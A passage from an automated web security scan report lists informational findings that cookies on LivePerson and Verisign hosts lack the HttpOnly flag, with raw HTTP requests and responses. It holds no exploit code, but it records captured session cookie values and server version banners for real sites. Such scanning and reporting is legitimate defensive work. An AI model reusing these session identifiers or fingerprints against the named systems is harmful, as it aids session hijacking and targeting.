cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/8 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/store/resources/index.jsp?inid=us_pagenotfound_smb_store
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; HumanClickKEY=298575764909514573; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603875047

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Set-Cookie: HumanClickKEY=298575764909514573; path=/hc/71097838
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603876:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:16 GMT; path=/hc/71097838; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:16 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"942795420530-312355306232","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

10.60. http://sales.liveperson.net/hc/71097838/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=170505760237-674877319251&protV=20&lpjson=1&id=7041138736&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315578244934

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=7999207371985552108; path=/hc/71097838
Set-Cookie: HumanClickACTIVE=1315603614239; expires=Sat, 10-Sep-2011 21:26:54 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"170505760237-674877319251","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.61. http://sales.liveperson.net/hc/71097838/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71097838/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.67. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

10.68. https://trust-center.verisign.ch/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.69. https://trust-center.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@.......................................            ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a.        d...i.    .h...
...[SNIP]...

10.70. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

10.71. https://trust-center.verisign.com/process/retail/help_and_support

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

10.72. https://trust-center.verisign.com/process/retail/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.73. https://trust-center.verisign.com/process/retail/trust_initial

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:26:31 GMT
Server: Apache
Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


10.74. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:02 GMT
Server: Apache
Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /rcm/TeaLeafTarget.html HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
Content-Length: 1103
X-TeaLeaf-Page-Objects: 0
Origin: https://trust-center.verisign.com
X-TeaLeaf-Page-Img-Fail: 1
X-TeaLeaf-Page-Render: 123
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
